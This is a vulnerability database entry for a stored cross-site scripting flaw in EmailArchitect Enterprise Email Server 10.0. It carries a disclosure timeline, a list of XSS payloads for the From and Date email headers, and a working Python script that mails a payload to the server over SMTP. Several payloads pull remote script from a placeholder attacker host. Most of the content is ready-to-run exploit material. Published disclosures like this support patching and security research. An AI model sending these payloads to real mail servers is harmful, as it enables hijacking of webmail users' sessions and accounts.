emailarchitect enterprise email server 10.0 - Stored XSS

🗓️ 01 Jul 2014 00:00:00Reported by RootType

vulnerability in EmailArchitect Enterprise Email Server 10.0 allows stored cross-site scripting (XSS) attack


                                                #!/usr/bin/python

&#39;&#39;&#39;
Author: loneferret of Offensive Security
Product: EmailArchitect Enterprise Email Server
Version: 10.0
Vendor Site: http://www.emailarchitect.net
Software Download Link: http://www.emailarchitect.net/webapp/download/easetup.exe

Timeline:
29 May 2012: Vulnerability reported to CERT
30 May 2012: Response received from CERT with disclosure date set to 20 Jul 2012
23 Jul 2012: Update from CERT: No response from vendor
08 Aug 2012: Public Disclosure

Installed On: Windows Server 2003 SP2
Client Test OS: Window 7 Pro SP1 (x86), OS: MAC OS Lion
Browser Used: Internet Explorer 9, Firefox 12

Injection Point: From
Injection Payload(s):
1:  &#39;;alert(String.fromCharCode(88,83,83))//\&#39;;alert(String.fromCharCode(88,83,83))//&#34;;alert(String.fromCharCode(88,83,83))//\&#34;;alert(String.fromCharCode(88,83,83))//--&#62;&#60;/SCRIPT&#62;&#34;&#62;&#39;&#62;&#60;SCRIPT&#62;alert(String.fromCharCode(88,83,83))&#60;/SCRIPT&#62;=&{}

Injection Point: Date
Injection Payload(s):
1: &#39;;alert(String.fromCharCode(88,83,83))//\&#39;;alert(String.fromCharCode(88,83,83))//&#34;;alert(String.fromCharCode(88,83,83))//\&#34;;alert(String.fromCharCode(88,83,83))//--&#62;&#60;/SCRIPT&#62;&#34;&#62;&#39;&#62;&#60;SCRIPT&#62;alert(String.fromCharCode(88,83,83))&#60;/SCRIPT&#62;=&{}
2: &#60;SCRIPT&#62;alert(&#39;XSS&#39;)&#60;/SCRIPT&#62;
3: &#60;SCRIPT SRC=http://attacker/xss.js&#62;&#60;/SCRIPT&#62;
4: &#60;SCRIPT&#62;alert(String.fromCharCode(88,83,83))&#60;/SCRIPT&#62;
5: &#60;IFRAME SRC=&#34;javascript:alert(&#39;XSS&#39;);&#34;&#62;&#60;/IFRAME&#62;
6: &#60;/TITLE&#62;&#60;SCRIPT&#62;alert(&#34;XSS&#34;);&#60;/SCRIPT&#62;
7: &#60;SCRIPT/XSS SRC=&#34;http://attacker/xss.js&#34;&#62;&#60;/SCRIPT&#62;
8: &#60;SCRIPT a=&#34;&#62;&#39;&#62;&#34; SRC=&#34;http://attacker/xss.js&#34;&#62;&#60;/SCRIPT&#62; 

&#39;&#39;&#39;


import smtplib, urllib2

payload = &#34;&#34;&#34;&#60;SCRIPT SRC=http://attacker/xss.js&#62;&#60;/SCRIPT&#62;&#34;&#34;&#34;

def sendMail(dstemail, frmemail, smtpsrv, username, password):
        msg  = &#34;From: [email protected]\n&#34;
        msg += &#34;To: [email protected]\n&#34;
        msg += &#34;Date: Today&#34; + payload + &#34;\r\n&#34;
        msg += &#34;Subject: XSS\n&#34;
        msg += &#34;Content-type: text/html\n\n&#34;
        msg += &#34;XSS.\r\n\r\n&#34;
        server = smtplib.SMTP(smtpsrv)
        server.login(username,password)
        try:
                server.sendmail(frmemail, dstemail, msg)
        except Exception, e:
                print &#34;[-] Failed to send email:&#34;
                print &#34;[*] &#34; + str(e)
        server.quit()

username = &#34;[email protected]&#34;
password = &#34;123456&#34;
dstemail = &#34;[email protected]&#34;
frmemail = &#34;[email protected]&#34;
smtpsrv  = &#34;172.16.84.171&#34;

print &#34;[*] Sending Email&#34;
sendMail(dstemail, frmemail, smtpsrv, username, password)

01 Jul 2014 00:00Current

7.1High risk

Vulners AI Score7.1